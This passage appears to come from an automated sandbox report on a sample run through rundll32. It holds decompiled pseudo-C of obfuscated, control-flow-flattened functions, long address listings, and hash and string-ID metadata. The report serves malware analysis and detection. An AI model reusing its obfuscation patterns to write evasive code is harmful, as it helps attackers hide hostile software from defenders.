							E00792B62(_v168, _t823, _v156, _v140);
							_t977 = 0x9a35046;
							goto L11;
						}
						__eflags = _t977 - 0x81a6b17;
						if(_t977 == 0x81a6b17) {
							E00792B62(_v192, _t976, _v200, _v284);
							_t977 = 0x51daea9;
							goto L37;
						}
						__eflags = _t977 - 0x9a35046;
						if(_t977 == 0x9a35046) {
							E00792B62(_v280, _t986, _v176, _v288);
							goto L41;
						}
						__eflags = _t977 - 0xb70b8d2;
						if(_t977 == 0xb70b8d2) {
							__eflags = E007AA2E8(_t976, _a4);
							_t977 = 0x81a6b17;
							_t829 = 1;
							_t862 =  !=  ? _t829 : _t862;
							goto L11;
						}
						__eflags = _t977 - 0xba06d79;
						if(__eflags == 0) {
							__eflags = E007B09B5(_t976, _v120, __eflags) - _v36;
							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
							goto L11;
						}
						__eflags = _t977 - 0xbee37f5;
						if(_t977 != 0xbee37f5) {
							goto L38;
						}
						_t832 = _v8;
						_t888 =  *_t832;
						__eflags = _t888;
						if(_t888 == 0) {
							_t833 = 0;
							__eflags = 0;
						} else {
							_t833 = _t832[1];
						}
						E00792AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
						_t988 =  &(_t988[7]);
						asm("sbb esi, esi");
						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
						goto L11;
					}
				}
			}

















































































































                                                                                                                          0x007ae39f
                                                                                                                          0x007ae3a8
                                                                                                                          0x007ae3af
                                                                                                                          0x007ae3b6
                                                                                                                          0x007ae3bd
                                                                                                                          0x007ae3c4
                                                                                                                          0x007ae3cb
                                                                                                                          0x007ae3d2
                                                                                                                          0x007ae3d9
                                                                                                                          0x007ae3e0
                                                                                                                          0x007ae3e7
                                                                                                                          0x007ae3ee
                                                                                                                          0x007ae3f5
                                                                                                                          0x007ae3fc
                                                                                                                          0x007ae400
                                                                                                                          0x007ae401
                                                                                                                          0x007ae406
                                                                                                                          0x007ae40e
                                                                                                                          0x007ae411
                                                                                                                          0x007ae41b
                                                                                                                          0x007ae422
                                                                                                                          0x007ae42a
                                                                                                                          0x007ae42c
                                                                                                                          0x007ae437
                                                                                                                          0x007ae445
                                                                                                                          0x007ae44a
                                                                                                                          0x007ae453
                                                                                                                          0x007ae45e
                                                                                                                          0x007ae469
                                                                                                                          0x007ae474
                                                                                                                          0x007ae47b
                                                                                                                          0x007ae486
                                                                                                                          0x007ae491
                                                                                                                          0x007ae4a4
                                                                                                                          0x007ae4a5
                                                                                                                          0x007ae4a9
                                                                                                                          0x007ae4b0
                                                                                                                          0x007ae4bb
                                                                                                                          0x007ae4c3
                                                                                                                          0x007ae4c8
                                                                                                                          0x007ae4d2
                                                                                                                          0x007ae4d6
                                                                                                                          0x007ae4de
                                                                                                                          0x007ae4e9
                                                                                                                          0x007ae4f4
                                                                                                                          0x007ae4ff
                                                                                                                          0x007ae50a
                                                                                                                          0x007ae515
                                                                                                                          0x007ae520
                                                                                                                          0x007ae52b
                                                                                                                          0x007ae536
                                                                                                                          0x007ae54a
                                                                                                                          0x007ae551
                                                                                                                          0x007ae55c
                                                                                                                          0x007ae564
                                                                                                                          0x007ae569
                                                                                                                          0x007ae576
                                                                                                                          0x007ae57a
                                                                                                                          0x007ae582
                                                                                                                          0x007ae58d
                                                                                                                          0x007ae5a0
                                                                                                                          0x007ae5a7
                                                                                                                          0x007ae5b2
                                                                                                                          0x007ae5bc
                                                                                                                          0x007ae5c4
                                                                                                                          0x007ae5cf
                                                                                                                          0x007ae5d4
                                                                                                                          0x007ae5d8
                                                                                                                          0x007ae5e0
                                                                                                                          0x007ae5e8
                                                                                                                          0x007ae5ed
                                                                                                                          0x007ae5f5
                                                                                                                          0x007ae5fa
                                                                                                                          0x007ae602
                                                                                                                          0x007ae60d
                                                                                                                          0x007ae618
                                                                                                                          0x007ae623
                                                                                                                          0x007ae632
                                                                                                                          0x007ae635
                                                                                                                          0x007ae636
                                                                                                                          0x007ae63a
                                                                                                                          0x007ae63f
                                                                                                                          0x007ae647
                                                                                                                          0x007ae64f
                                                                                                                          0x007ae65a
                                                                                                                          0x007ae665
                                                                                                                          0x007ae670
                                                                                                                          0x007ae680
                                                                                                                          0x007ae684
                                                                                                                          0x007ae690
                                                                                                                          0x007ae694
                                                                                                                          0x007ae69c
                                                                                                                          0x007ae6b2
                                                                                                                          0x007ae6b9
                                                                                                                          0x007ae6c4
                                                                                                                          0x007ae6cf
                                                                                                                          0x007ae6e1
                                                                                                                          0x007ae6e6
                                                                                                                          0x007ae6ed
                                                                                                                          0x007ae6f8
                                                                                                                          0x007ae707
                                                                                                                          0x007ae708
                                                                                                                          0x007ae70c
                                                                                                                          0x007ae714
                                                                                                                          0x007ae724
                                                                                                                          0x007ae728
                                                                                                                          0x007ae730
                                                                                                                          0x007ae73e
                                                                                                                          0x007ae742
                                                                                                                          0x007ae74a
                                                                                                                          0x007ae752
                                                                                                                          0x007ae75a
                                                                                                                          0x007ae762
                                                                                                                          0x007ae767
                                                                                                                          0x007ae76f
                                                                                                                          0x007ae777
                                                                                                                          0x007ae77f
                                                                                                                          0x007ae787
                                                                                                                          0x007ae791
                                                                                                                          0x007ae796
                                                                                                                          0x007ae79e
                                                                                                                          0x007ae7ac
                                                                                                                          0x007ae7b1
                                                                                                                          0x007ae7b7
                                                                                                                          0x007ae7bf
                                                                                                                          0x007ae7cb
                                                                                                                          0x007ae7d0
                                                                                                                          0x007ae7d6
                                                                                                                          0x007ae7de
                                                                                                                          0x007ae7ea
                                                                                                                          0x007ae7ef
                                                                                                                          0x007ae7f5
                                                                                                                          0x007ae7fd
                                                                                                                          0x007ae805
                                                                                                                          0x007ae80d
                                                                                                                          0x007ae815
                                                                                                                          0x007ae821
                                                                                                                          0x007ae826
                                                                                                                          0x007ae82c
                                                                                                                          0x007ae834
                                                                                                                          0x007ae83c
                                                                                                                          0x007ae841
                                                                                                                          0x007ae846
                                                                                                                          0x007ae84e
                                                                                                                          0x007ae859
                                                                                                                          0x007ae861
                                                                                                                          0x007ae869
                                                                                                                          0x007ae874
                                                                                                                          0x007ae87f
                                                                                                                          0x007ae88a
                                                                                                                          0x007ae895
                                                                                                                          0x007ae8a0
                                                                                                                          0x007ae8ab
                                                                                                                          0x007ae8b6
                                                                                                                          0x007ae8be
                                                                                                                          0x007ae8d0
                                                                                                                          0x007ae8d5
                                                                                                                          0x007ae8de
                                                                                                                          0x007ae8e9
                                                                                                                          0x007ae8f4
                                                                                                                          0x007ae8ff
                                                                                                                          0x007ae90a
                                                                                                                          0x007ae915
                                                                                                                          0x007ae920
                                                                                                                          0x007ae932
                                                                                                                          0x007ae935
                                                                                                                          0x007ae93c
                                                                                                                          0x007ae947
                                                                                                                          0x007ae952
                                                                                                                          0x007ae95d
                                                                                                                          0x007ae968
                                                                                                                          0x007ae973
                                                                                                                          0x007ae97e
                                                                                                                          0x007ae989
                                                                                                                          0x007ae99f
                                                                                                                          0x007ae9a4
                                                                                                                          0x007ae9ab
                                                                                                                          0x007ae9b6
                                                                                                                          0x007ae9ca
                                                                                                                          0x007ae9cf
                                                                                                                          0x007ae9d6
                                                                                                                          0x007ae9de
                                                                                                                          0x007ae9e9
                                                                                                                          0x007ae9f7
                                                                                                                          0x007ae9fc
                                                                                                                          0x007aea00
                                                                                                                          0x007aea05
                                                                                                                          0x007aea0a
                                                                                                                          0x007aea12
                                                                                                                          0x007aea1d
                                                                                                                          0x007aea28
                                                                                                                          0x007aea33
                                                                                                                          0x007aea48
                                                                                                                          0x007aea49
                                                                                                                          0x007aea50
                                                                                                                          0x007aea5b
                                                                                                                          0x007aea63
                                                                                                                          0x007aea6b
                                                                                                                          0x007aea73
                                                                                                                          0x007aea7b
                                                                                                                          0x007aea83
                                                                                                                          0x007aea90
                                                                                                                          0x007aea94
                                                                                                                          0x007aea9c
                                                                                                                          0x007aeaa4
                                                                                                                          0x007aeaac
                                                                                                                          0x007aeabf
                                                                                                                          0x007aeac6
                                                                                                                          0x007aeace
                                                                                                                          0x007aead9
                                                                                                                          0x007aeae4
                                                                                                                          0x007aeaef
                                                                                                                          0x007aeaf7
                                                                                                                          0x007aeb02
                                                                                                                          0x007aeb0d
                                                                                                                          0x007aeb15
                                                                                                                          0x007aeb1d
                                                                                                                          0x007aeb28
                                                                                                                          0x007aeb30
                                                                                                                          0x007aeb3d
                                                                                                                          0x007aeb41
                                                                                                                          0x007aeb49
                                                                                                                          0x007aeb51
                                                                                                                          0x007aeb67
                                                                                                                          0x007aeb6e
                                                                                                                          0x007aeb79
                                                                                                                          0x007aeb84
                                                                                                                          0x007aeb8c
                                                                                                                          0x007aeb97
                                                                                                                          0x007aebab
                                                                                                                          0x007aebb2
                                                                                                                          0x007aebbd
                                                                                                                          0x007aebc8
                                                                                                                          0x007aebd2
                                                                                                                          0x007aebda
                                                                                                                          0x007aebe5
                                                                                                                          0x007aebf4
                                                                                                                          0x007aebf5
                                                                                                                          0x007aebf9
                                                                                                                          0x007aebfe
                                                                                                                          0x007aec06
                                                                                                                          0x007aec0e
                                                                                                                          0x007aec16
                                                                                                                          0x007aec23
                                                                                                                          0x007aec27
                                                                                                                          0x007aec2f
                                                                                                                          0x007aec37
                                                                                                                          0x007aec3f
                                                                                                                          0x007aec47
                                                                                                                          0x007aec4f
                                                                                                                          0x007aec54
                                                                                                                          0x007aec5c
                                                                                                                          0x007aec64
                                                                                                                          0x007aec69
                                                                                                                          0x007aec6e
                                                                                                                          0x007aec73
                                                                                                                          0x007aec7b
                                                                                                                          0x007aec86
                                                                                                                          0x007aec91
                                                                                                                          0x007aec9c
                                                                                                                          0x007aeca4
                                                                                                                          0x007aecb1
                                                                                                                          0x007aecba
                                                                                                                          0x007aecbe
                                                                                                                          0x007aecc6
                                                                                                                          0x007aecd1
                                                                                                                          0x007aecdc
                                                                                                                          0x007aece7
                                                                                                                          0x007aecf2
                                                                                                                          0x007aecfa
                                                                                                                          0x007aed05
                                                                                                                          0x007aed10
                                                                                                                          0x007aed1d
                                                                                                                          0x007aed21
                                                                                                                          0x007aed29
                                                                                                                          0x007aed2e
                                                                                                                          0x007aed36
                                                                                                                          0x007aed41
                                                                                                                          0x007aed4c
                                                                                                                          0x007aed57
                                                                                                                          0x007aed5f
                                                                                                                          0x007aed67
                                                                                                                          0x007aed6f
                                                                                                                          0x007aed77
                                                                                                                          0x007aed7f
                                                                                                                          0x007aed87
                                                                                                                          0x007aed8c
                                                                                                                          0x007aed94
                                                                                                                          0x007aed9c
                                                                                                                          0x007aeda4
                                                                                                                          0x007aedac
                                                                                                                          0x007aedb4
                                                                                                                          0x007aedb9
                                                                                                                          0x007aedc1
                                                                                                                          0x007aedc9
                                                                                                                          0x007aedd4
                                                                                                                          0x007aeddf
                                                                                                                          0x007aedea
                                                                                                                          0x007aedfe
                                                                                                                          0x007aee05
                                                                                                                          0x007aee10
                                                                                                                          0x007aee1b
                                                                                                                          0x007aee26
                                                                                                                          0x007aee31
                                                                                                                          0x007aee3c
                                                                                                                          0x007aee49
                                                                                                                          0x007aee54
                                                                                                                          0x007aee5f
                                                                                                                          0x007aee67
                                                                                                                          0x007aee75
                                                                                                                          0x007aee7a
                                                                                                                          0x007aee80
                                                                                                                          0x007aee88
                                                                                                                          0x007aee90
                                                                                                                          0x007aee98
                                                                                                                          0x007aee9d
                                                                                                                          0x007aeea5
                                                                                                                          0x007aeead
                                                                                                                          0x007aeeb5
                                                                                                                          0x007aeebd
                                                                                                                          0x007aeec6
                                                                                                                          0x007aeecb
                                                                                                                          0x007aeed1
                                                                                                                          0x007aeed9
                                                                                                                          0x007aeee1
                                                                                                                          0x007aeee9
                                                                                                                          0x007aeef1
                                                                                                                          0x007aeef9
                                                                                                                          0x007aef01
                                                                                                                          0x007aef0c
                                                                                                                          0x007aef17
                                                                                                                          0x007aef22
                                                                                                                          0x007aef2d
                                                                                                                          0x007aef38
                                                                                                                          0x007aef43
                                                                                                                          0x007aef55
                                                                                                                          0x007aef5a
                                                                                                                          0x007aef6a
                                                                                                                          0x007aef6d
                                                                                                                          0x007aef74
                                                                                                                          0x007aef7f
                                                                                                                          0x007aef8a
                                                                                                                          0x007aef92
                                                                                                                          0x007aef9d
                                                                                                                          0x007aefa8
                                                                                                                          0x007aefb0
                                                                                                                          0x007aefb5
                                                                                                                          0x007aefbd
                                                                                                                          0x007aefc5
                                                                                                                          0x007aefcd
                                                                                                                          0x007aefd8
                                                                                                                          0x007aefe0
                                                                                                                          0x007aefeb
                                                                                                                          0x007aeff3
                                                                                                                          0x007aeffe
                                                                                                                          0x007af006
                                                                                                                          0x007af00e
                                                                                                                          0x007af016
                                                                                                                          0x007af01d
                                                                                                                          0x007af024
                                                                                                                          0x007af024
                                                                                                                          0x007af024
                                                                                                                          0x007af029
                                                                                                                          0x007af029
                                                                                                                          0x007af02d
                                                                                                                          0x007af02d
                                                                                                                          0x007af02d
                                                                                                                          0x007af02f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007af035
                                                                                                                          0x007af17e
                                                                                                                          0x007af181
                                                                                                                          0x007af183
                                                                                                                          0x007af18f
                                                                                                                          0x007af1a4
                                                                                                                          0x007af1a6
                                                                                                                          0x007af1a6
                                                                                                                          0x007af1e0
                                                                                                                          0x007af1e7
                                                                                                                          0x007af1e7
                                                                                                                          0x007af1e9
                                                                                                                          0x007af1eb
                                                                                                                          0x007af1eb
                                                                                                                          0x007af1f0
                                                                                                                          0x007af237
                                                                                                                          0x007af23d
                                                                                                                          0x007af242
                                                                                                                          0x007af245
                                                                                                                          0x007af247
                                                                                                                          0x007af2ff
                                                                                                                          0x007af24d
                                                                                                                          0x007af24d
                                                                                                                          0x007af258
                                                                                                                          0x007af25d
                                                                                                                          0x007af261
                                                                                                                          0x007af26f
                                                                                                                          0x007af270
                                                                                                                          0x007af279
                                                                                                                          0x007af27a
                                                                                                                          0x007af27f
                                                                                                                          0x007af282
                                                                                                                          0x007af284
                                                                                                                          0x007af2b3
                                                                                                                          0x007af2c8
                                                                                                                          0x007af2c8
                                                                                                                          0x007af2c8
                                                                                                                          0x007af2ed
                                                                                                                          0x007af2f2
                                                                                                                          0x007af2f2
                                                                                                                          0x007af2f5
                                                                                                                          0x007af2f5
                                                                                                                          0x007af096
                                                                                                                          0x007af096
                                                                                                                          0x00000000
                                                                                                                          0x007af096
                                                                                                                          0x007af041
                                                                                                                          0x007af16d
                                                                                                                          0x00000000
                                                                                                                          0x007af16d
                                                                                                                          0x007af04d
                                                                                                                          0x007af163
                                                                                                                          0x00000000
                                                                                                                          0x007af163
                                                                                                                          0x007af059
                                                                                                                          0x007af13f
                                                                                                                          0x007af144
                                                                                                                          0x007af148
                                                                                                                          0x007af14b
                                                                                                                          0x007af14d
                                                                                                                          0x007af156
                                                                                                                          0x007af15b
                                                                                                                          0x00000000
                                                                                                                          0x007af15b
                                                                                                                          0x007af065
                                                                                                                          0x007af09c
                                                                                                                          0x007af09d
                                                                                                                          0x007af0a4
                                                                                                                          0x007af0ab
                                                                                                                          0x007af0b5
                                                                                                                          0x007af0ca
                                                                                                                          0x007af0d6
                                                                                                                          0x007af0df
                                                                                                                          0x007af0ed
                                                                                                                          0x007af0f0
                                                                                                                          0x007af0f5
                                                                                                                          0x007af3fa
                                                                                                                          0x007af3fa
                                                                                                                          0x007af3fe
                                                                                                                          0x007af403
                                                                                                                          0x007af403
                                                                                                                          0x007af409
                                                                                                                          0x007af42b
                                                                                                                          0x007af434
                                                                                                                          0x007af434
                                                                                                                          0x007af029
                                                                                                                          0x00000000
                                                                                                                          0x007af029
                                                                                                                          0x007af06d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007af08a
                                                                                                                          0x007af091
                                                                                                                          0x00000000
                                                                                                                          0x007af091
                                                                                                                          0x007af309
                                                                                                                          0x007af30f
                                                                                                                          0x007af3ee
                                                                                                                          0x007af3f5
                                                                                                                          0x00000000
                                                                                                                          0x007af3f5
                                                                                                                          0x007af315
                                                                                                                          0x007af31b
                                                                                                                          0x007af421
                                                                                                                          0x00000000
                                                                                                                          0x007af427
                                                                                                                          0x007af326
                                                                                                                          0x007af328
                                                                                                                          0x007af3ce
                                                                                                                          0x007af3d0
                                                                                                                          0x007af3d7
                                                                                                                          0x007af3d8
                                                                                                                          0x00000000
                                                                                                                          0x007af3d8
                                                                                                                          0x007af32e
                                                                                                                          0x007af334
                                                                                                                          0x007af3b1
                                                                                                                          0x007af3b8
                                                                                                                          0x00000000
                                                                                                                          0x007af3b8
                                                                                                                          0x007af336
                                                                                                                          0x007af33c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007af342
                                                                                                                          0x007af349
                                                                                                                          0x007af34b
                                                                                                                          0x007af34d
                                                                                                                          0x007af354
                                                                                                                          0x007af354
                                                                                                                          0x007af34f
                                                                                                                          0x007af34f
                                                                                                                          0x007af34f
                                                                                                                          0x007af37a
                                                                                                                          0x007af37f
                                                                                                                          0x007af384
                                                                                                                          0x007af38c
                                                                                                                          0x00000000
                                                                                                                          0x007af38c
                                                                                                                          0x007af029

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: |<$!b$&Up$*b$7vM$<3$$=n$C$FKa$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                          • API String ID: 0-2766407278
                                                                                                                          • Opcode ID: 68dd77f2d84884ed3608c2f031be7d0ec045248f74ef94b6f2e9b111c8a000c6
                                                                                                                          • Instruction ID: ecf87c77bc4e274d36eab8ab868bdfd1ed1b099a15f8a948d6144544d8318809
                                                                                                                          • Opcode Fuzzy Hash: 68dd77f2d84884ed3608c2f031be7d0ec045248f74ef94b6f2e9b111c8a000c6
                                                                                                                          • Instruction Fuzzy Hash: BE820F71508381CFD378CF25C54AA8BBBE1BBD5718F108A2DE2D996260D7B48949CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079BB7E Relevance: 23.1, Strings: 18, Instructions: 637COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0079BB7E(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				void* _t690;
				void* _t691;
				void* _t697;
				void* _t700;
				void* _t701;
				void* _t704;
				void* _t710;
				char _t711;
				void* _t713;
				void* _t717;
				void* _t719;
				void* _t725;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				void* _t747;
				void* _t763;
				void* _t772;
				void* _t819;
				intOrPtr _t834;
				void* _t840;
				void* _t842;
				void* _t846;
				void* _t847;
				void* _t850;

				_v92 = 0xf68129;
				_v100 = __ecx;
				asm("stosd");
				_t732 = 0x6b;
				asm("stosd");
				_t846 = 0;
				_t725 = 0x7252bf3;
				asm("stosd");
				_v136 = 0x5ab987;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x0f97e334;
				_v240 = 0x5f59f0;
				_v240 = _v240 << 5;
				_v240 = _v240 * 0x46;
				_v240 = _v240 ^ 0x4252f400;
				_v320 = 0x63212;
				_v320 = _v320 + 0xffffd9b7;
				_v320 = _v320 * 0x26;
				_v320 = _v320 + 0xffff4af1;
				_v320 = _v320 ^ 0x00e50ac7;
				_v192 = 0x354250;
				_t26 =  &_v192; // 0x354250
				_v192 =  *_t26 * 0x43;
				_v192 = _v192 ^ 0x0df05af0;
				_v308 = 0x42c709;
				_v308 = _v308 | 0x3400f9ef;
				_v308 = _v308 << 3;
				_v308 = _v308 + 0x3df1;
				_v308 = _v308 ^ 0xa2183d69;
				_v152 = 0x5369e0;
				_v152 = _v152 ^ 0xff6c3c62;
				_v152 = _v152 ^ 0xff3f5582;
				_v276 = 0x14bd80;
				_v276 = _v276 << 5;
				_v276 = _v276 ^ 0x5f90d5fe;
				_v276 = _v276 / _t732;
				_v276 = _v276 ^ 0x00de92e5;
				_v164 = 0xc6025f;
				_t733 = 0x77;
				_v164 = _v164 / _t733;
				_v164 = _v164 ^ 0x0001a9f8;
				_v196 = 0xc87c9f;
				_v196 = _v196 + 0x15df;
				_v196 = _v196 ^ 0x00c8927e;
				_v316 = 0xe66987;
				_v316 = _v316 ^ 0x1b2582a6;
				_t734 = 0x3b;
				_v316 = _v316 * 0x5b;
				_v316 = _v316 + 0x2fb1;
				_v316 = _v316 ^ 0xdea4c46c;
				_v224 = 0xfe0ac2;
				_v224 = _v224 + 0xfffff1ae;
				_v224 = _v224 ^ 0x9ea75b7a;
				_v224 = _v224 ^ 0x9e5aa70a;
				_v272 = 0x969b46;
				_v272 = _v272 / _t734;
				_t735 = 0x5e;
				_v272 = _v272 / _t735;
				_v272 = _v272 ^ 0xefd30b8f;
				_v272 = _v272 ^ 0xefd30d7c;
				_v376 = 0x150d1;
				_v376 = _v376 + 0xf180;
				_v376 = _v376 ^ 0x94f4a204;
				_v376 = _v376 + 0xffff1e44;
				_v376 = _v376 ^ 0x94f362d9;
				_v156 = 0xee57c3;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x00740491;
				_v212 = 0xc602fd;
				_v212 = _v212 + 0x6a76;
				_v212 = _v212 + 0x1c99;
				_v212 = _v212 ^ 0x00ce641d;
				_v268 = 0xce4877;
				_v268 = _v268 ^ 0x1d22fca4;
				_v268 = _v268 | 0x3421cf88;
				_v268 = _v268 ^ 0x3de53c3b;
				_v124 = 0x747c03;
				_v124 = _v124 + 0xffffbae7;
				_v124 = _v124 ^ 0x007459dd;
				_v236 = 0x1c09ef;
				_t736 = 0x7d;
				_v236 = _v236 * 0x24;
				_v236 = _v236 >> 5;
				_v236 = _v236 ^ 0x00154586;
				_v248 = 0xce2f;
				_v248 = _v248 / _t736;
				_v248 = _v248 ^ 0x54fb24c5;
				_v248 = _v248 ^ 0x54f69380;
				_v368 = 0xa2f216;
				_v368 = _v368 ^ 0x77671628;
				_v368 = _v368 + 0xffffb776;
				_t737 = 0x12;
				_v368 = _v368 * 0x54;
				_v368 = _v368 ^ 0x4cdde93a;
				_v256 = 0x7ecaf1;
				_v256 = _v256 + 0xffff3fac;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x003aef01;
				_v352 = 0xabf876;
				_v352 = _v352 >> 0xb;
				_v352 = _v352 + 0xffff46d6;
				_v352 = _v352 + 0x2c0c;
				_v352 = _v352 ^ 0xfff246b3;
				_v360 = 0x97ba77;
				_v360 = _v360 ^ 0x3e0377f3;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 / _t737;
				_v360 = _v360 ^ 0x00060934;
				_v336 = 0x8ce7a6;
				_t738 = 0x2f;
				_v336 = _v336 / _t738;
				_v336 = _v336 + 0xffff2624;
				_v336 = _v336 | 0x278756f7;
				_v336 = _v336 ^ 0x278bbfdd;
				_v344 = 0xbf551b;
				_v344 = _v344 * 0x3a;
				_v344 = _v344 ^ 0x84c4554b;
				_v344 = _v344 << 0xf;
				_v344 = _v344 ^ 0x8ea60236;
				_v200 = 0x4381fe;
				_v200 = _v200 | 0xd1728d79;
				_v200 = _v200 ^ 0xd172d7b5;
				_v304 = 0x80f198;
				_t739 = 0x31;
				_v304 = _v304 * 0x64;
				_v304 = _v304 << 0xe;
				_v304 = _v304 + 0xffff9e99;
				_v304 = _v304 ^ 0x97d19a3f;
				_v312 = 0x373eb5;
				_v312 = _v312 / _t739;
				_v312 = _v312 >> 9;
				_v312 = _v312 ^ 0x9e5751db;
				_v312 = _v312 ^ 0x9e5d4ba0;
				_v188 = 0xb51e1e;
				_t740 = 0x6d;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x21f969de;
				_v128 = 0x6dafe5;
				_v128 = _v128 + 0xdb72;
				_v128 = _v128 ^ 0x00632f59;
				_v348 = 0xf775fc;
				_v348 = _v348 * 0x7b;
				_v348 = _v348 | 0xe77e6c6c;
				_v348 = _v348 + 0xffff92b3;
				_v348 = _v348 ^ 0xf7fd41f8;
				_v292 = 0x49707d;
				_v292 = _v292 + 0xffffa330;
				_v292 = _v292 + 0x378d;
				_v292 = _v292 ^ 0x2a616ae7;
				_v292 = _v292 ^ 0x2a2200cf;
				_v148 = 0xe2ca7f;
				_v148 = _v148 + 0x2800;
				_v148 = _v148 ^ 0x00ec4a73;
				_v180 = 0x28ed65;
				_t276 =  &_v180; // 0x28ed65
				_v180 =  *_t276 / _t740;
				_v180 = _v180 ^ 0x0008a356;
				_v340 = 0xb04f06;
				_v340 = _v340 | 0x19ae51aa;
				_v340 = _v340 + 0xffff0ab2;
				_v340 = _v340 >> 7;
				_v340 = _v340 ^ 0x003d7bf7;
				_v252 = 0x779412;
				_t741 = 0x28;
				_v252 = _v252 / _t741;
				_v252 = _v252 | 0x065d8c29;
				_v252 = _v252 ^ 0x0653787d;
				_v140 = 0x2cf99d;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x7ccdbf9f;
				_v300 = 0xa5c7e2;
				_v300 = _v300 ^ 0xf64f2b87;
				_v300 = _v300 | 0xd6032566;
				_v300 = _v300 << 7;
				_v300 = _v300 ^ 0x75f4cdbc;
				_v204 = 0xc71fe4;
				_v204 = _v204 ^ 0x39f608ad;
				_v204 = _v204 ^ 0x39346367;
				_v332 = 0x26340b;
				_t742 = 0xc;
				_v332 = _v332 / _t742;
				_v332 = _v332 >> 0xc;
				_v332 = _v332 + 0x4006;
				_v332 = _v332 ^ 0x00056ca9;
				_v244 = 0xb4bdd0;
				_v244 = _v244 ^ 0x9dcc8204;
				_t743 = 0x5c;
				_v244 = _v244 * 0x56;
				_v244 = _v244 ^ 0xe668140d;
				_v228 = 0xb7abf;
				_v228 = _v228 ^ 0x8d46dccd;
				_v228 = _v228 / _t743;
				_v228 = _v228 ^ 0x0183fb21;
				_v132 = 0x744574;
				_t744 = 0x2d;
				_v132 = _v132 * 0x27;
				_v132 = _v132 ^ 0x11b9ba9e;
				_v384 = 0x4471dc;
				_v384 = _v384 ^ 0x8273491f;
				_v384 = _v384 / _t744;
				_v384 = _v384 + 0xffffe0da;
				_v384 = _v384 ^ 0x02e26e3a;
				_v324 = 0x605f40;
				_v324 = _v324 + 0xffffce94;
				_v324 = _v324 + 0xffff95c1;
				_v324 = _v324 >> 6;
				_v324 = _v324 ^ 0x0001f278;
				_v380 = 0xfa4dc1;
				_t745 = 0x17;
				_v380 = _v380 * 0x71;
				_v380 = _v380 ^ 0x12ce666f;
				_v380 = _v380 | 0xc76ff931;
				_v380 = _v380 ^ 0xfff34e85;
				_v172 = 0xf73d33;
				_v172 = _v172 >> 7;
				_v172 = _v172 ^ 0x0001a374;
				_v364 = 0xb38f71;
				_v364 = _v364 + 0x4143;
				_v364 = _v364 ^ 0x53c53aac;
				_v364 = _v364 / _t745;
				_v364 = _v364 ^ 0x03acc109;
				_v260 = 0xa91f99;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0xc9224c65;
				_v260 = _v260 ^ 0xc926367a;
				_v284 = 0x5ea8fe;
				_v284 = _v284 * 0x3e;
				_v284 = _v284 | 0x757fbe3f;
				_v284 = _v284 ^ 0x77fedad5;
				_v264 = 0xc1651a;
				_v264 = _v264 / _t745;
				_v264 = _v264 + 0x650c;
				_v264 = _v264 ^ 0x00066731;
				_v372 = 0xd53751;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 * 0x50;
				_v372 = _v372 ^ 0xc5a53504;
				_v372 = _v372 ^ 0xc5a85656;
				_v220 = 0x28743;
				_v220 = _v220 | 0x747e4fe0;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0078aec3;
				_v356 = 0x673303;
				_v356 = _v356 + 0xffff3afb;
